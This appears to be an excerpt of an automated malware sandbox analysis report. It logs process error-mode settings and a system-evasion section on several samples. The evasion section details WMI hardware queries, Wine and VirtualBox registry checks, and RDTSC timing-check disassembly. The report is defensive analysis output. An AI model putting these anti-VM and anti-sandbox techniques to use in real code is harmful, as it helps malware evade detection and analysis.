                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Found API chain indicative of sandbox detection
                                    Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_17-95497
                                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Tries to detect sandboxes / dynamic malware analysis system (registry check)
                                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\1000015002\b74664dd7e.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                                    Tries to detect virtualization through RDTSC time measurements
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F1D5 second address: E0F1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F1D9 second address: E0F1FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jo 00007F4B90BE6226h 0x00000016 popad 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F1FB second address: E0EACF instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B9132D698h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d jmp 00007F4B9132D69Bh 0x00000012 push dword ptr [ebp+122D0D41h] 0x00000018 jns 00007F4B9132D6A1h 0x0000001e jmp 00007F4B9132D69Bh 0x00000023 call dword ptr [ebp+122D2E7Eh] 0x00000029 pushad 0x0000002a mov dword ptr [ebp+122D346Ah], ebx 0x00000030 xor eax, eax 0x00000032 jo 00007F4B9132D69Ch 0x00000038 pushad 0x00000039 mov ecx, edi 0x0000003b mov ecx, edi 0x0000003d popad 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 sub dword ptr [ebp+122D346Ah], ebx 0x00000048 mov dword ptr [ebp+122D2998h], eax 0x0000004e sub dword ptr [ebp+122D346Ah], edx 0x00000054 mov esi, 0000003Ch 0x00000059 cld 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e mov dword ptr [ebp+122D183Ch], edi 0x00000064 lodsw 0x00000066 jmp 00007F4B9132D69Eh 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jne 00007F4B9132D6A7h 0x00000075 mov ebx, dword ptr [esp+24h] 0x00000079 cld 0x0000007a nop 0x0000007b jmp 00007F4B9132D6A7h 0x00000080 push eax 0x00000081 jbe 00007F4B9132D6A0h 0x00000087 pushad 0x00000088 push ebx 0x00000089 pop ebx 0x0000008a push eax 0x0000008b push edx 0x0000008c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91548 second address: F9154C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8C1A8 second address: F8C1E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4B9132D6A0h 0x0000000b pushad 0x0000000c jnl 00007F4B9132D696h 0x00000012 jmp 00007F4B9132D6A9h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9071D second address: F90721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90721 second address: F90727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F90DF8 second address: F90DFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F948A9 second address: F948AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F948AD second address: E0EACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F4B90BE623Fh 0x0000000c popad 0x0000000d add dword ptr [esp], 3EAE31B3h 0x00000014 push dword ptr [ebp+122D0D41h] 0x0000001a call dword ptr [ebp+122D2E7Eh] 0x00000020 pushad 0x00000021 mov dword ptr [ebp+122D346Ah], ebx 0x00000027 xor eax, eax 0x00000029 jo 00007F4B90BE622Ch 0x0000002f pushad 0x00000030 mov ecx, edi 0x00000032 mov ecx, edi 0x00000034 popad 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 sub dword ptr [ebp+122D346Ah], ebx 0x0000003f mov dword ptr [ebp+122D2998h], eax 0x00000045 sub dword ptr [ebp+122D346Ah], edx 0x0000004b mov esi, 0000003Ch 0x00000050 cld 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 mov dword ptr [ebp+122D183Ch], edi 0x0000005b lodsw 0x0000005d jmp 00007F4B90BE622Eh 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 jne 00007F4B90BE6237h 0x0000006c mov ebx, dword ptr [esp+24h] 0x00000070 cld 0x00000071 nop 0x00000072 jmp 00007F4B90BE6237h 0x00000077 push eax 0x00000078 jbe 00007F4B90BE6230h 0x0000007e pushad 0x0000007f push ebx 0x00000080 pop ebx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94998 second address: F9499D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94A1E second address: F94A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94B15 second address: F94B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4B9132D6A7h 0x0000000a popad 0x0000000b add dword ptr [esp], 2A7FDFF4h 0x00000012 mov dword ptr [ebp+122D3310h], edx 0x00000018 lea ebx, dword ptr [ebp+124597D6h] 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F4B9132D698h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000016h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov edx, esi 0x0000003a xchg eax, ebx 0x0000003b jmp 00007F4B9132D69Eh 0x00000040 push eax 0x00000041 pushad 0x00000042 pushad 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94B79 second address: F94B9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4B90BE6232h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F4B90BE622Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94C0A second address: F94C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94C0E second address: F94C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94C19 second address: F94CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007F4B9132D696h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 popad 0x00000012 nop 0x00000013 js 00007F4B9132D699h 0x00000019 movsx ecx, dx 0x0000001c push 00000000h 0x0000001e or ecx, dword ptr [ebp+122D297Ch] 0x00000024 push 6978462Dh 0x00000029 pushad 0x0000002a jne 00007F4B9132D698h 0x00000030 push ebx 0x00000031 pop ebx 0x00000032 push ecx 0x00000033 jmp 00007F4B9132D6A4h 0x00000038 pop ecx 0x00000039 popad 0x0000003a xor dword ptr [esp], 697846ADh 0x00000041 clc 0x00000042 push 00000003h 0x00000044 jg 00007F4B9132D69Ch 0x0000004a push 00000000h 0x0000004c push 00000000h 0x0000004e push esi 0x0000004f call 00007F4B9132D698h 0x00000054 pop esi 0x00000055 mov dword ptr [esp+04h], esi 0x00000059 add dword ptr [esp+04h], 00000014h 0x00000061 inc esi 0x00000062 push esi 0x00000063 ret 0x00000064 pop esi 0x00000065 ret 0x00000066 jmp 00007F4B9132D6A2h 0x0000006b push 00000003h 0x0000006d ja 00007F4B9132D697h 0x00000073 push C416B966h 0x00000078 push eax 0x00000079 push edx 0x0000007a jmp 00007F4B9132D69Eh 0x0000007f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F94CC6 second address: F94D29 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4B90BE6237h 0x00000008 jmp 00007F4B90BE6231h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xor dword ptr [esp], 0416B966h 0x00000016 jmp 00007F4B90BE622Bh 0x0000001b lea ebx, dword ptr [ebp+124597E1h] 0x00000021 push 00000000h 0x00000023 push edi 0x00000024 call 00007F4B90BE6228h 0x00000029 pop edi 0x0000002a mov dword ptr [esp+04h], edi 0x0000002e add dword ptr [esp+04h], 00000019h 0x00000036 inc edi 0x00000037 push edi 0x00000038 ret 0x00000039 pop edi 0x0000003a ret 0x0000003b jnl 00007F4B90BE622Ah 0x00000041 xchg eax, ebx 0x00000042 pushad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F76429 second address: F7643A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Ch 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1FB5 second address: FB1FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1FC5 second address: FB1FD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jne 00007F4B9132D696h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2250 second address: FB2271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007F4B90BE622Eh 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 je 00007F4B90BE6226h 0x00000018 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB25BD second address: FB25C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB25C7 second address: FB25CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB25CB second address: FB25CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2729 second address: FB272D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB272D second address: FB273D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4B9132D696h 0x0000000a je 00007F4B9132D696h 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB273D second address: FB274C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F4B90BE6226h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
